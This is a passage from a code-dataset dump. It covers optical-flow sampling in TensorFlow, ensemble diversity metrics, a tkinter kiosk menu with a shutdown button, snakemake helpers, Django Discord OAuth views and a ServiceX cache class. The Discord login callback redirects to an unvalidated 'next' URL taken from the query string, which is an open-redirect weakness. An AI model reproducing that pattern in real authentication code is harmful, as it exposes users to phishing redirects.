- p_fill, p_fill]]), height * width, output_dtype=tf.int32) # note log-prob\n sampling_mask = tf.reshape(samples, (height, width))\n # Matches with shape (h, w, 1)\n matches = tf.cast(tf.expand_dims(sampling_mask, -1), dtype=tf.float32) # convert to (h, w, 1)\n # Generate sparse flow from sampling mask (matches but without extra dimension and dtype=tf.int32)\n sparse_flow = mask_to_sparse_flow(sampling_mask, gt_flow)\n\n return matches, sparse_flow\n\n\n# Functions to sample ground truth flow with different density and probability distribution\ndef sample_sparse_invalid_like(gt_flow, target_density=75, height=384, width=512):\n print(\"sample_sparse_invalid_like\")\n # Important: matches is already normalised to [0, 1], only use those values\n rand_offset_h, rand_offset_w, crop_h, crop_w = get_random_offset_and_crop((height, width), target_density)\n\n # Define matches as 0 inside the random bbox, 1s elsewhere\n ones = lambda: tf.ones((height * width), dtype=tf.float32)\n # Assumption: matches is already a flatten array (when inputted to set_range...)\n matches = tf.Variable(initial_value=ones, dtype=tf.float32, trainable=False)\n matches = set_range_to_zero(matches, width, rand_offset_h, rand_offset_w, crop_h, crop_w)\n # (optionally) generate more invalid regions (with while_loop based on a random_value, minimum 1 more)\n matches = corrupt_sparse_flow_loop(matches, target_density * (2 / 3), height, width)\n\n # Convert back to (height, width)\n matches = tf.reshape(matches, (height, width))\n sampling_mask = tf.cast(matches, dtype=tf.int32)\n matches = tf.expand_dims(matches, -1) # convert to (h, w, 1)\n # sampling_mask = sampling_mask[:, :, tf.newaxis] # convert to (h, w, 1)\n # sampling_mask_rep = tf.tile(sampling_mask, [1, 1, 2]) # repeat 1st channel into second (h, w, 2)\n # sampling_mask_flatten = tf.reshape(sampling_mask_rep, [-1])\n # sampling_mask_flatten_where = tf.where(tf.equal(sampling_mask_flatten, 1))\n # sampling_mask_flatten_where = tf.reshape(sampling_mask_flatten_where, [-1])\n #\n # gt_flow_sampling_mask = tf.boolean_mask(gt_flow, sampling_mask_rep)\n # zeros = lambda: tf.zeros(tf.reduce_prod(gt_flow.shape), dtype=tf.float32)\n # sparse_flow = tf.Variable(initial_value=zeros, dtype=tf.float32, trainable=False)\n # sparse_flow = tf.scatter_update(sparse_flow, sampling_mask_flatten_where, gt_flow_sampling_mask)\n # sparse_flow = tf.reshape(sparse_flow, gt_flow.shape)\n sparse_flow = mask_to_sparse_flow(sampling_mask, gt_flow)\n\n return matches, sparse_flow\n\n\n# Comments:\n# trying to learn with different distributions mixed (invalid-like and more-or-less sparse ones may be too difficult)\n# Try only less or more dense and then fine-tuned to \"holes-like\"/invalid-like\ndef sample_from_distribution(distrib_id, density, dm_matches, dm_flow, gt_flow):\n default_density = 25 # default density to use with default uniform sampling\n height, width, _ = gt_flow.get_shape().as_list()\n # aux_choice = tf.random_uniform([], maxval=2, dtype=tf.int32) # 0 or 1\n # sample_dm = tf.cond(tf.logical_and(tf.greater(aux_choice, tf.constant(0)),\n # tf.less_equal(density, tf.constant(1.0))), lambda: tf.constant(True), lambda: tf.constant(False))\n # sample_dm = tf.cond(True if (np.random.choice([0, 1]) > 0 and density <= 1) else False\n # matches, sparse_flow = tf.switch_case(distrib_id, branch_fns={\n # 0: lambda: return_identity(dm_matches, dm_flow),\n # 1: lambda: sample_sparse_uniform(gt_flow, target_density=density, height=height, width=width),\n # 2: lambda: sample_sparse_invalid_like(gt_flow, target_density=density, height=height, width=width),\n # }, default=lambda: sample_sparse_uniform(gt_flow, target_density=default_density, height=height, width=width))\n matches, sparse_flow = tf.case(\n {\n # tf.logical_and(tf.equal(distrib_id, tf.constant(0)),\n # tf.equal(sample_dm, tf.constant(False))): lambda: sample_sparse_grid_like(\n # gt_flow, target_density=density, height=height, width=width),\n # tf.logical_and(tf.equal(distrib_id, tf.constant(0)),\n # tf.equal(sample_dm, tf.constant(True))): lambda: return_identity(dm_matches, dm_flow),\n tf.equal(distrib_id, tf.constant(0)): lambda: return_identity(dm_matches, dm_flow),\n tf.equal(distrib_id, tf.constant(1)): lambda: sample_sparse_uniform(gt_flow, target_density=density,\n height=height, width=width),\n tf.equal(distrib_id, tf.constant(2)): lambda: sample_sparse_invalid_like(gt_flow, target_density=density,\n height=height, width=width)\n },\n default=lambda: sample_sparse_uniform(gt_flow, target_density=default_density, height=height, width=width),\n exclusive=True)\n\n # Ensure we do not give an almost empty mask back\n min_percentage = 0.01\n sampled_percentage = tf.multiply(100.0, tf.divide(tf.reduce_sum(matches), tf.cast(tf.multiply(height, width),\n dtype=tf.float32)))\n tf.summary.scalar('debug/sampled_percentage', sampled_percentage)\n\n matches, sparse_flow = tf.cond(tf.greater_equal(sampled_percentage, min_percentage),\n lambda: return_identity(matches, sparse_flow),\n lambda: return_identity(dm_matches, dm_flow))\n\n return matches, sparse_flow\n\n\ndef sample_sparse_flow(dm_matches, dm_flow, gt_flow, num_ranges=(4, 2), num_distrib=2, invalid_like=-1,\n fixed_density=-1, min_val=0, ff_like=-1):\n # apply_with_random_selector does not work for our case (maybe it interferes with tf.slim or something else...)\n # use tf.case instead\n # density = apply_with_random_selector(density, lambda x, ordering: get_sampling_density(x, ordering, fast_mode),\n # num_cases=num_ranges)\n dense_or_sparse = tf.random_uniform([], minval=min_val, maxval=2, dtype=tf.int32) # 0 or 1\n # density = tf.cond(tf.logical_and(tf.equal(tf.convert_to_tensor(num_distrib), tf.constant(-1)),\n # tf.greater(tf.convert_to_tensor(fixed_density), tf.constant(0.0))),\n # lambda: tf.convert_to_tensor(fixed_density),\n # lambda: get_sampling_density(dense_or_sparse, num_ranges=num_ranges))\n density = get_sampling_density(dense_or_sparse, num_ranges=num_ranges, ff_like=ff_like)\n tf.summary.scalar('debug/density', density)\n\n invalid_like_tensor = tf.cond(tf.greater(tf.convert_to_tensor(invalid_like), tf.constant(0)),\n lambda: tf.constant(True), lambda: tf.constant(False))\n # Select a distribution (random uniform, invalid like or grid like with holes\n distrib_id = tf.cond(tf.equal(invalid_like_tensor, tf.constant(True)),\n # lambda: tf.constant(2),\n lambda: tf.random_uniform([], minval=2, maxval=3, dtype=tf.int32), # tf.constant(2)\n lambda: tf.random_uniform([], maxval=num_distrib, dtype=tf.int32))\n # distrib_id = tf.case(\n # {\n # tf.equal(invalid_like_tensor, tf.constant(True)): lambda: tf.constant(2),\n # tf.equal(tf.convert_to_tensor(num_distrib), tf.constant(-1)): lambda: tf.constant(1),\n # },\n # default=lambda: tf.random_uniform([], maxval=num_distrib, dtype=tf.int32), exclusive=True)\n\n # distrib_id = tf.random_uniform([], maxval=num_distrib, dtype=tf.int32) # np.random.choice(range(num_distrib))\n matches, sparse_flow = sample_from_distribution(distrib_id, density, dm_matches, dm_flow, gt_flow)\n tf.summary.scalar('debug/distrib_id', distrib_id)\n\n return matches, sparse_flow\n","sub_path":"src/data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":30854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"58841192","text":"# coding=utf-8\n# Copyright 2020 The Uncertainty Metrics Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Metrics for model diversity.\"\"\"\n\nimport itertools\nimport torch\n\n\ndef disagreement(logits_1, logits_2):\n \"\"\"Disagreement between the predictions of two classifiers.\"\"\"\n preds_1 = torch.argmax(logits_1, dim=-1).type(torch.int32)\n preds_2 = torch.argmax(logits_2, dim=-1).type(torch.int32)\n return torch.mean((preds_1 != preds_2).type(torch.float32))\n\n\ndef double_fault(logits_1, logits_2, labels):\n \"\"\"Double fault [1] is the number of examples both classifiers predict wrong.\n\n Args:\n logits_1: tf.Tensor.\n logits_2: tf.Tensor.\n labels: tf.Tensor.\n\n Returns:\n Scalar double-fault diversity metric.\n\n ## References\n\n [1] Kuncheva, Ludmila I., and Christopher J. Whitaker. \"Measures of diversity\n in classifier ensembles and their relationship with the ensemble\n accuracy.\" Machine learning 51.2 (2003): 181-207.\n \"\"\"\n preds_1 = torch.argmax(logits_1, dim=-1).type(labels.dtype)\n preds_2 = torch.argmax(logits_2, dim=-1).type(labels.dtype)\n\n res = torch.where(preds_1 != labels)\n res = torch.stack(res).t()\n fault_1_idx = torch.squeeze(res)\n fault_1_idx = fault_1_idx.type(torch.int32)\n\n preds_2_at_idx = torch.gather(preds_2, fault_1_idx)\n labels_at_idx = torch.gather(labels, fault_1_idx)\n\n double_faults = preds_2_at_idx != labels_at_idx\n double_faults = double_faults.type(torch.float32)\n return torch.mean(double_faults)\n\n\ndef logit_kl_divergence(logits_1, logits_2):\n \"\"\"Average KL divergence between logit distributions of two classifiers.\"\"\"\n probs_1 = torch.softmax(logits_1, dim=-1)\n probs_2 = torch.softmax(logits_2, dim=-1)\n vals = kl_divergence(probs_1, probs_2)\n return torch.mean(vals)\n\n\ndef kl_divergence(p, q, clip=False):\n \"\"\"Generalized KL divergence [1] for unnormalized distributions.\n\n Args:\n p: tf.Tensor.\n q: tf.Tensor.\n clip: bool.\n\n Returns:\n tf.Tensor of the Kullback-Leibler divergences per example.\n\n ## References\n\n [1] Lee, Daniel D., and H. Sebastian Seung. \"Algorithms for non-negative\n matrix factorization.\" Advances in neural information processing systems.\n 2001.\n \"\"\"\n if clip:\n p = torch.clamp(p, torch.finfo(torch.float32).eps, 1)\n q = torch.clamp(q, torch.finfo(torch.float32).eps, 1)\n return torch.sum(p * torch.log(p / q), dim=-1)\n\n\ndef lp_distance(x, y, p=1):\n \"\"\"l_p distance.\"\"\"\n diffs_abs = torch.abs(x - y)\n summation = torch.sum(torch.pow(diffs_abs, p), dim=-1)\n return torch.mean(torch.pow(summation, 1. / p), dim=-1)\n\n\ndef cosine_distance(x, y):\n \"\"\"Cosine distance between vectors x and y.\"\"\"\n x_norm = torch.sqrt(torch.sum(torch.pow(x, 2), dim=-1))\n x_norm = x_norm.view(-1, 1)\n y_norm = torch.sqrt(torch.sum(torch.pow(y, 2), dim=-1))\n y_norm = y_norm.view((-1, 1))\n normalized_x = x / x_norm\n normalized_y = y / y_norm\n return torch.mean(torch.sum(normalized_x * normalized_y, dim=-1))\n\n\n# TODO(ghassen): we could extend this to take an arbitrary list of metric fns.\ndef average_pairwise_diversity(probs, num_models, error=None):\n \"\"\"Average pairwise distance computation across models.\"\"\"\n if probs.shape[0] != num_models:\n raise ValueError('The number of models {0} does not match '\n 'the probs length {1}'.format(num_models, probs.shape[0]))\n\n pairwise_disagreement = []\n pairwise_kl_divergence = []\n pairwise_cosine_distance = []\n for pair in list(itertools.combinations(range(num_models), 2)):\n probs_1 = probs[pair[0]]\n probs_2 = probs[pair[1]]\n pairwise_disagreement.append(disagreement(probs_1, probs_2))\n pairwise_kl_divergence.append(\n torch.mean(kl_divergence(probs_1, probs_2)))\n pairwise_cosine_distance.append(cosine_distance(probs_1, probs_2))\n\n # TODO(ghassen): we could also return max and min pairwise metrics.\n average_disagreement = torch.mean(torch.stack(pairwise_disagreement))\n if error is not None:\n average_disagreement /= (error + torch.finfo(torch.float32).eps)\n average_kl_divergence = torch.mean(torch.stack(pairwise_kl_divergence))\n average_cosine_distance = torch.mean(torch.stack(pairwise_cosine_distance))\n\n return {\n 'disagreement': average_disagreement,\n 'average_kl': average_kl_divergence,\n 'cosine_similarity': average_cosine_distance\n }\n\n\ndef variance_bound(probs, labels, num_models):\n \"\"\"Empirical upper bound on the variance for an ensemble model.\n\n This term was introduced in arxiv.org/abs/1912.08335 to obtain a tighter\n PAC-Bayes upper bound; we use the empirical variance of Theorem 4.\n\n Args:\n probs: tensor of shape `[num_models, batch_size, n_classes]`.\n labels: tensor of sparse labels, of shape `[batch_size]`.\n num_models: number of models in the ensemble.\n\n Returns:\n A (float) upper bound on the empirical ensemble variance.\n \"\"\"\n if probs.shape[0] != num_models:\n raise ValueError('The number of models {0} does not match '\n 'the probs length {1}'.format(num_models, probs.shape[0]))\n batch_size = probs.shape[1]\n labels = labels.type(torch.int32)\n\n # batch_indices maps point `i` to its associated label `l_i`.\n batch_indices = torch.stack([torch.arange(0, batch_size), labels], dim=1)\n # Shape: [num_models, batch_size, batch_size].\n batch_indices = batch_indices * torch.ones([num_models, 1, 1])\n\n # Replicate batch_indices across the `num_models` index.\n ensemble_indices = torch.arange(0, num_models).view([num_models, 1, 1])\n ensemble_indices = ensemble_indices * torch.ones([1, batch_size, 1])\n # Shape: [num_models, batch_size, n_classes].\n indices = torch.cat([ensemble_indices, batch_indices], dim=-1)\n\n # Shape: [n_models, n_points].\n # per_model_probs[n, i] contains the probability according to model `n` that\n # point `i` in the batch has its true label.\n per_model_probs = gather_nd(probs, indices)\n\n max_probs, _ = torch.max(per_model_probs, dim=0) # Shape: [n_points]\n avg_probs = torch.mean(per_model_probs, dim=0) # Shape: [n_points]\n\n return .5 * torch.mean(\n torch.square((per_model_probs - avg_probs) / max_probs))\n\n\ndef gather_nd(params, indices):\n \"\"\"params is of \"n\" dimensions and has size [x1, x2, x3, ..., xn],\n indices is of 2 dimensions and has size [num_samples, m] (m <= n)\n \"\"\"\n assert type(indices) == torch.Tensor\n return params[indices.transpose(0, 1).long().numpy().tolist()]\n","sub_path":"uncertainty_metrics/torch/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":7142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"242651112","text":"from tkinter import *\nimport tkinter.font as TkFont\nimport webbrowser\nimport os\n#from googlesearch import *\n\nroot = Tk()\nroot.title(\"Menu\")\nroot.configure(bg='#2b2b2b')\nroot.geometry('550x320')\nroot.resizable(width=0, height=0)\n'''\ndef center_window(width=745, height=120):\n \tscreen_width = root.winfo_screenwidth()\n \tscreen_height = root.winfo_screenheight()\n \tx = (screen_width/2) - (width/2)\n\t\ty = (screen_height/2) - (height/2)\n \troot.geometry('%dx%d+%d+%d' % (width, height, x, y))\n\ncenter_window(560, 320)\n'''\nfont = TkFont.Font(size=25)\ndef weather():\n\twebbrowser.open('https://www.twojapogoda.pl/')\ndef info():\n\twebbrowser.open('https://echodnia.eu/swietokrzyskie/wiadomosci/wloszczowa/')\ndef wylacz():\n\tos.system(\"shutdown now\")\ndef inter():\n\twebbrowser.open('https://google.com')\ninternet = Button(root, text=\"Internet\", command=inter, padx=74, pady=50, bg='#2b2b2b', fg='#fff', font=font)\npogoda = Button(root, text=\"Pogoda\", command=weather, padx=75, pady=50, bg='#2b2b2b', fg='#fff', font=font)\nwiadomosci = Button(root, text=\"Wloszczowa\", command=info, padx=37, pady=50, bg='#2b2b2b', fg='#fff', font=font)\nwylacz = Button(root, text=\"Wylacz\", command=wylacz, padx=78, pady=50, bg='#2b2b2b', fg='#fff', font=font)\nbo = Label(root, text=\"Biuro Obslugi Klienta: Milosz\", pady=5, fg='#fff', bg='#2b2b2b')\n\ninternet.grid(row=1, column=0)\npogoda.grid(row=1,column=1)\nwiadomosci.grid(row=2,column=0)\nwylacz.grid(row=2,column=1)\nbo.grid(row=3,column=0, columnspan=2)\n\nroot.mainloop()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"634218890","text":"__all__ = ['TemporaryDirectory', 'DeleteOnError', 'TerminalSlider', 'slider', 'slider_file']\n\nimport tempfile\nimport shutil\nimport os\nimport sys\nimport re\nimport time\n\nclass TemporaryDirectory:\n def __init__(self, dir='.'):\n self.dir = dir\n self.path = None\n\n def __enter__(self):\n self.path = tempfile.mkdtemp(dir=self.dir)\n return self.path\n\n def __exit__(self, type, value, traceback):\n if self.path is not None:\n shutil.rmtree(self.path)\n\nclass DeleteOnError:\n def __init__(self, path, opener=None):\n self.path = path\n self.opener = opener\n\n def __enter__(self):\n if self.opener is None:\n return open(self.path, 'wb')\n else:\n return self.opener(self.path, 'wb')\n\n def __exit__(self, type, value, traceback):\n if type is not None and os.path.exists(self.path):\n os.unlink(self.path)\n\ndef dotint(v):\n dotstr = str(v)\n left = dotstr[:len(dotstr)%3]\n right = re.findall('...', dotstr[len(dotstr)%3:])\n if left:\n right.insert(0, left)\n return ','.join(right)\n\nclass TerminalSlider:\n def __init__(self, maxpos, initpos=0):\n self.barfill = -1\n self.maxpos = maxpos\n self.initpos = initpos\n self.sessmax = maxpos - initpos\n try:\n import fcntl, termios, struct\n s = struct.pack(\"HHHH\", 0, 0, 0, 0)\n self.cols = struct.unpack(\"HHHH\", fcntl.ioctl(sys.stderr.fileno(),\n termios.TIOCGWINSZ, s))[1]\n except:\n self.cols = 78\n\n # 4(percent) + 2([]) + 4(spaces) + 2(endmark)\n self.barsize = self.cols - 12\n self.barsize -= len(dotint(maxpos)) # done value\n self.barfmt = '\\r%%-4s [%%s>%%s] %%-%ds ' % len(dotint(maxpos))\n self.barsize -= 23\n self.st = time.time()\n self.update(0)\n\n def update(self, value, *ext):\n if self.maxpos > 0:\n newfill = (value + self.initpos) * self.barsize // self.maxpos\n percent = str(value * 100 // self.maxpos)+'%'\n else:\n newfill = self.barsize\n percent = '0%'\n self.barfill = newfill\n sys.stderr.write(self.barfmt %\n (percent,\n '='*(newfill - 1), ' '*(self.barsize-newfill), dotint(value)))\n\n if value * 30 >= self.sessmax: # over 3%\n elapsed = time.time() - self.st\n if value > 0:\n estimated = int(self.sessmax / value * elapsed - elapsed)\n else:\n estimated = self.sessmax\n sys.stderr.write(\" ETA %02d:%02d\" %\n (estimated // 60, estimated % 60))\n sys.stderr.flush()\n\n def end(self):\n sys.stderr.write('\\n')\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.end()\n\ndef slider(it, length=None, updateevery=None):\n if length is None:\n try:\n length = len(it)\n except ValueError:\n it = list(it)\n length = len(it)\n\n s = TerminalSlider(length, 0)\n try:\n for i, el in enumerate(it):\n if updateevery is None or i % updateevery == 0:\n s.update(i)\n yield el\n else:\n s.update(length)\n finally:\n s.end()\n\ndef slider_file(f, updateevery=1000):\n f.seek(0, os.SEEK_END)\n filesize = f.tell()\n f.seek(0, os.SEEK_SET)\n\n s = TerminalSlider(filesize, 0)\n try:\n for i, it in enumerate(f):\n if i % updateevery == 0:\n s.update(f.tell())\n yield it\n else:\n s.update(filesize)\n finally:\n s.end()\n\ntry:\n limit\nexcept NameError:\n # backport from J. Koester's commit a78fe7a.\n def limit(pattern, **wildcards):\n return pattern.format(**{\n wildcard: \"{{{},{}}}\".format(wildcard, \"|\".join(values))\n for wildcard, values in wildcards.items()\n })\n","sub_path":"workflows/snakesupport.py","file_name":"snakesupport.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"195395374","text":"\"\"\"\n\nThe MIT License (MIT)\n\nCopyright (c) 2016, Mark Rogaski\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n\"\"\"\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\n\nfrom django.http import HttpResponseRedirect\n\ntry:\n from django.urls import reverse\nexcept ImportError:\n from django.core.urlresolvers import reverse\n\nfrom django.utils.timezone import make_aware\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.core.exceptions import PermissionDenied\n\nimport requests\nfrom requests_oauthlib import OAuth2Session\n\nfrom discord_bind.models import DiscordUser, DiscordInvite\nfrom discord_bind.conf import settings\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef oauth_session(request, state=None, token=None):\n \"\"\" Constructs the OAuth2 session object. \"\"\"\n if settings.DISCORD_REDIRECT_URI is not None:\n redirect_uri = settings.DISCORD_REDIRECT_URI\n else:\n redirect_uri = request.build_absolute_uri(\n reverse('discord_bind_callback'))\n scope = (['identify', 'email'] if settings.DISCORD_EMAIL_SCOPE\n else ['identify'])\n if settings.DISCORD_GUILDS_SCOPE:\n scope.append(\"guilds\")\n if settings.DISCORD_INVITE_SCOPE:\n scope.append(\"guilds.join\")\n if settings.DISCORD_CONNECTIONS_SCOPE:\n scope.append(\"connections\")\n if request.GET.get(\"raise_email\", False):\n if 'email' not in scope:\n scope.append('email')\n if request.GET.get(\"optout_email\", False):\n if 'email' in scope:\n scope.remove('email')\n if request.GET.get(\"optout_join\", False):\n if 'guilds.join' in scope:\n scope.remove('guilds.join')\n if request.GET.get(\"raise_3rdparty\", False):\n if 'connections' not in scope:\n scope.append('connections')\n if request.GET.get(\"raise_guilds\", False):\n if 'guilds.join' not in scope:\n scope.append('guilds.join')\n return OAuth2Session(settings.DISCORD_CLIENT_ID,\n redirect_uri=redirect_uri,\n scope=scope,\n token=token,\n state=state)\n\n\ndef index(request):\n # Record the final redirect alternatives\n if 'invite_uri' in request.GET:\n request.session['discord_bind_invite_uri'] = request.GET['invite_uri']\n else:\n request.session['discord_bind_invite_uri'] = (\n settings.DISCORD_INVITE_URI)\n\n if 'return_uri' in request.GET:\n request.session['discord_bind_return_uri'] = request.GET['return_uri']\n else:\n request.session['discord_bind_return_uri'] = (\n settings.DISCORD_RETURN_URI)\n\n if 'next' in request.GET:\n request.session['discord_bind_next_uri'] = request.GET.get('next', \"/\")\n else:\n request.session['discord_bind_next_uri'] = \"/\"\n\n # Compute the authorization URI\n oauth = oauth_session(request)\n url, state = oauth.authorization_url(settings.DISCORD_BASE_URI +\n settings.DISCORD_AUTHZ_PATH)\n url = url + \"&prompt=none\"\n request.session['discord_bind_oauth_state'] = state\n return HttpResponseRedirect(url)\n\n\ndef callback(request):\n def decompose_data(user, token):\n \"\"\" Extract the important details \"\"\"\n data = {\n 'uid': user['id'],\n 'username': user['username'],\n 'discriminator': user['discriminator'],\n 'email': user.get('email', ''),\n 'avatar': user.get('avatar', ''),\n 'access_token': token['access_token'],\n 'refresh_token': token.get('refresh_token', ''),\n 'scope': ' '.join(token.get('scope', '')),\n }\n for k in data:\n if data[k] is None:\n data[k] = ''\n try:\n expiry = datetime.utcfromtimestamp(float(token['expires_at']))\n if settings.USE_TZ:\n expiry = make_aware(expiry)\n data['expiry'] = expiry\n except KeyError:\n pass\n return data\n\n def bind_user(request, data):\n \"\"\" Create or update a DiscordUser instance \"\"\"\n uid = data.pop('uid')\n\n remote_user = authenticate(request, remote_user=str(uid))\n\n if remote_user is not None:\n login(request, remote_user)\n else:\n return HttpResponseRedirect(\"/?login_error=true\")\n\n usrs = DiscordUser.objects.filter(uid=uid)\n usr_count = 0\n for usr in usrs:\n for k, v in data.items():\n setattr(usr, k, v)\n usr.save()\n usr_count += 1\n\n if usr_count == 0:\n new_user = DiscordUser(uid=uid, user=remote_user, **data)\n new_user.save()\n print(\"ERROR: \" + new_user.username)\n\n response = request.build_absolute_uri()\n state = request.session['discord_bind_oauth_state']\n if request.GET.get('error', False):\n if request.GET.get('error', \"\") == \"access_denied\":\n if settings.DISCORD_ERROR_URI:\n redir_url = settings.DISCORD_ERROR_URI\n else:\n redir_url = \"/\"\n return HttpResponseRedirect(\"{}?error=access_denied\".format(redir_url))\n if 'state' not in request.GET or request.GET['state'] != state:\n raise PermissionDenied\n oauth = oauth_session(request, state=state)\n token = oauth.fetch_token(settings.DISCORD_BASE_URI +\n settings.DISCORD_TOKEN_PATH,\n client_secret=settings.DISCORD_CLIENT_SECRET,\n authorization_response=response)\n\n # Get Discord user data\n user = oauth.get(settings.DISCORD_BASE_URI + '/users/@me').json()\n data = decompose_data(user, token)\n if settings.DISCORD_EMAIL_REQUIRED and data['email'] in (None, \"\", \" \"):\n return HttpResponseRedirect(\"{}?error=access_denied\".format(settings.DISCORD_ERROR_URI if settings.DISCORD_ERROR_URI else \"/\"))\n bind_user(request, data)\n\n # Accept Discord invites\n groups = request.user.groups.all()\n invites = DiscordInvite.objects.filter(active=True).filter(\n Q(groups__in=groups) | Q(groups=None))\n count = 0\n for invite in invites:\n r = oauth.post(settings.DISCORD_BASE_URI + '/invites/' + invite.code)\n if r.status_code == requests.codes.ok:\n count += 1\n logger.info(('accepted Discord '\n 'invite for %s/%s') % (invite.guild_name,\n invite.channel_name))\n else:\n logger.error(('failed to accept Discord '\n 'invite for %s/%s: %d %s') % (invite.guild_name,\n invite.channel_name,\n r.status_code,\n r.reason))\n\n # Select return target\n if count > 0:\n messages.success(request, '%d Discord invite(s) accepted.' % count)\n url = request.session.get('discord_bind_next_uri', \"/\")\n # url = request.session['discord_bind_invite_uri']\n else:\n url = request.session.get('discord_bind_next_uri', \"/\")\n\n # Clean up\n try:\n del request.session['discord_bind_oauth_state']\n del request.session['discord_bind_invite_uri']\n del request.session['discord_bind_return_uri']\n del request.session['discord_bind_next_uri']\n except:\n pass\n\n return HttpResponseRedirect(url)\n","sub_path":"discord_bind/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"370058617","text":"import json\nfrom pathlib import Path\nfrom typing import Dict, List, Optional, Tuple, Any\nfrom contextlib import contextmanager\n\nfrom .utils import ServiceXException, _query_cache_hash, sanitize_filename\n\n_ignore_cache = False\n\n# Make sure that generated download path names are below this to avoid os errors\nMAX_PATH_LEN = 235\n\n\n@contextmanager\ndef ignore_cache():\n '''This will cause all caches to be ignored while it is invoked:\n\n ```\n with ignore_cache():\n ServiceXDataset(...).get_data...()\n ```\n\n If you want to do this globally, you can just use the `__enter__()` method.\n This is probably the only way to do this accross cells in a notebook.\n\n ```\n i = ignore_cache()\n i.__enter__()\n ... Query code, jupyter notebook cells, etc. go here\n i.__exit(None, None, None)\n ```\n\n Note:\n\n - The only time the cache is checked is when the query is actually made, not when\n the servicex dataset object is created!\n - Calls to this can be safely nested.\n - Note that calling this doesn't clear the cache or delete anything. It\n just prevents the cache lookup from working while it is in effect.\n '''\n global _ignore_cache\n old_value = _ignore_cache\n _ignore_cache = True\n yield\n _ignore_cache = old_value\n\n\nclass Cache:\n '''\n Caching for all data returns from the system. It provides both in-memory\n and on-disk cache.\n\n TODO: Rename this to be an adaptor, unifying how we name things\n '''\n _in_memory_cache = {}\n\n @classmethod\n def reset_cache(cls):\n 'Reset the internal cache, usually used for testing'\n cls._in_memory_cache = {}\n\n def __init__(self, cache_path: Path, ignore_cache: bool = False):\n '''\n Create the cache object\n\n Arguments:\n\n cache_path The path to the cache directory. Only sub-directories\n will be created in this path.\n ignore_cache If true, then always ignore the cache for any queries\n against this dataset.\n '''\n self._path = cache_path\n self._ignore_cache = ignore_cache\n\n @property\n def path(self) -> Path:\n 'Return root path of cache directory'\n return self._path\n\n @contextmanager\n def ignore_cache(self):\n '''Ignore the cache as long as we are held. Supports nesting.\n '''\n old_ignore = self._ignore_cache\n self._ignore_cache = True\n yield\n self._ignore_cache = old_ignore\n\n def _query_cache_file(self, json: Dict[str, str]) -> Path:\n 'Return the query cache file'\n h = _query_cache_hash(json)\n return self._path / 'query_cache' / h\n\n def _query_status_cache_file(self, request_id: str) -> Path:\n 'Return the query cache file'\n return self._path / 'query_cache_status' / request_id\n\n def _files_cache_file(self, id: str) -> Path:\n 'Return the file that contains the list of files'\n return self._path / 'file_list_cache' / id\n\n def lookup_query(self, json: Dict[str, str]) -> Optional[str]:\n global _ignore_cache\n if _ignore_cache or self._ignore_cache:\n return None\n\n f = self._query_cache_file(json)\n if not f.exists():\n return None\n\n with f.open('r') as i:\n return i.readline().strip()\n\n def set_query(self, json: Dict[str, str], v: str):\n f = self._query_cache_file(json)\n f.parent.mkdir(parents=True, exist_ok=True)\n with f.open('w') as o:\n o.write(f'{v}\\n')\n\n def set_query_status(self, query_info: Dict[str, str]):\n '''Cache a query status (json dict)\n\n Args:\n query_info (Dict[str, str]): The info we should cache. Must contain `request_id`.\n '''\n assert 'request_id' in query_info, \\\n \"Internal error - request_id should always be part of info returned\"\n f = self._query_status_cache_file(query_info['request_id'])\n f.parent.mkdir(parents=True, exist_ok=True)\n with f.open('w') as o:\n json.dump(query_info, o)\n\n def lookup_query_status(self, request_id: str) -> Dict[str, str]:\n '''Returns the info from the last time the query status was cached.\n\n Args:\n request_id (str): Request id we should look up.\n\n '''\n f = self._query_status_cache_file(request_id)\n if not f.exists():\n raise ServiceXException(f'Not cache information for query {request_id}')\n with f.open('r') as o:\n return json.load(o)\n\n def remove_query(self, json: Dict[str, str]):\n f = self._query_cache_file(json)\n if f.exists():\n f.unlink()\n\n def set_files(self, id: str, files: List[Tuple[str, str]]):\n f = self._files_cache_file(id)\n f.parent.mkdir(parents=True, exist_ok=True)\n with f.open('w') as o:\n 